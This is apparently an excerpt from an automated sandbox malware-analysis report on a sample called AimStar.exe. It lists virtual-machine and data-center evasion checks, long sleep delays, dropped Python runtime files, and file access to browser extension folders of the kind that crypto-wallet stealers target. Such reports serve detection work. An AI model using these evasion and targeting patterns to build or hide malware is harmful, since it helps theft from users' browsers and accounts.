Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 2_2_00007FF8A87C632A str word ptr [rax+63h]

2_2_00007FF8A87C632A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8322	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1129	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8434	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1075	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4508
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3635
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1959
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 490
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2643
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1579

Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AimStar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Evaded block: after key decision

graph_88-39457

Source: C:\Users\user\Desktop\AimStar.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17363

Source: C:\Users\user\Desktop\AimStar.exe

API coverage: 5.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep count: 8322 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 1129 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 8434 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 1075 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5528	Thread sleep count: 4508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464	Thread sleep count: 1150 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep count: 876 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 7948	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760	Thread sleep count: 5551 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 490 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep count: 3376 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688	Thread sleep count: 100 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep count: 3284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 668 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep count: 2643 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep count: 1579 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F492F0 FindFirstFileExW,FindClose,	0_2_00007FF710F492F0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF710F483B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF710F618E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F492F0 FindFirstFileExW,FindClose,	2_2_00007FF710F492F0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF710F483B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF710F618E4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	88_2_00007FF7139746EC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71396E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	88_2_00007FF71396E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B88E0 FindFirstFileExA,	88_2_00007FF7139B88E0

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 2_2_00007FF8A8761240 GetSystemInfo,

2_2_00007FF8A8761240

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi\	Jump to behavior

Source: getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AimStar.exe, 00000002.00000003.2056720050.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054308282.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2208913842.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: decodeqemu-ga
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f15vmsrvc
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: SIHClient.exe, 0000003C.00000003.2514336802.000001B10EDE5000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2210012229.000001B10EDE9000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EDE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-ga
